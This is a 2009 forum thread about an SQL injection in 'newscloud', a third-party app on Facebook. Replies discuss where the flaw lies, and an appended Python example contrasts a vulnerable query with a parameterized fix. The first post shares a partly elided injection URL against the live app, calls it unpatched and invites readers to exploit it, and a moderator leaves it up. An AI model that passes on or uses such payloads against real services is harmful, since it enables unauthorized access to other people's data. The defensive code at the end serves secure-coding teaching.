
Thread: Facebook SQL Injection

  1. #1
    Junior Member | Join Date: Mar 2003 | Posts: 12

    Facebook SQL Injection

    *** t34b4g5's Edit: I am allowing this thread to remain, see post below ***


    I'm not sure if I'm allowed to post this here; if this is against the rules, just remove the thread.

    A team member discovered this a few weeks ago and it still seems to be unpatched.

    Be my guest and play a little with them; a site as big as Facebook should be aware of security, hopefully their box is hardened.
    ***Click at your own Risk***
    http://apps.facebook.com/newscloud/?...737764%29,10--
    ***Click at your own Risk***
    Last edited by t34b4g5; September 16th, 2009 at 11:38 AM.
    silent play in the shadow of power...

  2. #2
    t34b4g5, Senior Member | Join Date: Sep 2003 | Location: Australia | Posts: 2,391

    Greetz..

    Nice thread, wish there were more types of threads like this being posted.

    Anyhow, I am letting this thread stay, simply because these aren't the freshest PoCs floating atm.

    So until they are rendered useless, don't be silly and get yourself raided by the FBI'z.

  3. #3
    d34dl0k1, Member | Join Date: Mar 2007 | Posts: 58

    Actually, what you've found is an injection in a third-party app on Facebook.

    http://developers.facebook.com/

    apps.facebook.com is the domain name, but that's not their data.

  4. #4
    souleman, AntiOnline Senior Member | Join Date: Oct 2001 | Location: Flint, MI | Posts: 2,883

    Considering what the third-party app is (newscloud), it doesn't really surprise me.

    If I remember correctly (been a while since I looked at it), there is a problem with the Facebook API that allows any member to post their own information. Instead of setting it up like the members are contributors, it is set up like they are members, so they "need" direct access to the database. Even if Facebook fixed the problem, I'm sure a lot of developers didn't do it right. You can probably get the same type of results from most apps that allow people to submit their own content on Facebook.

    "Ignorance is bliss....
    but only for your enemy"
    -- souleman
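An added example (not code from the thread or from the app it discusses) of the pattern souleman describes: a value submitted by a member reaching the query as raw SQL text, next to the parameterized form that closes the hole. The `items` table, its rows and the `owner` lookup are constructed assumptions, since the real app's schema is not known.

```python
import sqlite3

# Constructed sample data standing in for a third-party app's content table.
# Assumption: the app keeps member-submitted items in one table keyed by owner.
SAMPLE_ITEMS = [
    (1, "alice", "Public post"),
    (2, "bob", "Another public post"),
    (3, "carol", "Private draft"),
]


def make_db():
    """Build an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, owner TEXT, body TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?, ?)", SAMPLE_ITEMS)
    return conn


def find_items_vulnerable(conn, owner):
    """Defect: the request value is spliced into the SQL string, so a quote
    in it ends the literal and the rest is executed as SQL."""
    sql = "SELECT id, owner, body FROM items WHERE owner = '%s'" % owner
    return conn.execute(sql).fetchall()


def find_items_safe(conn, owner):
    """Fix: the value is bound as a parameter; the driver never lets it
    alter the query text, whatever characters it contains."""
    sql = "SELECT id, owner, body FROM items WHERE owner = ?"
    return conn.execute(sql, (owner,)).fetchall()


def compare(owner):
    """Return (rows from the vulnerable query, rows from the safe query)
    for the same input, to show where the two diverge."""
    conn = make_db()
    return len(find_items_vulnerable(conn, owner)), len(find_items_safe(conn, owner))
```

For an ordinary owner name both functions agree; for a value carrying a quote the vulnerable one returns every row while the safe one returns none. Independently of parameterization, the account an app connects with should not hold privileges such as MySQL's FILE, which is what lets an injection turn into a read of server files like the one shown in the first post.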
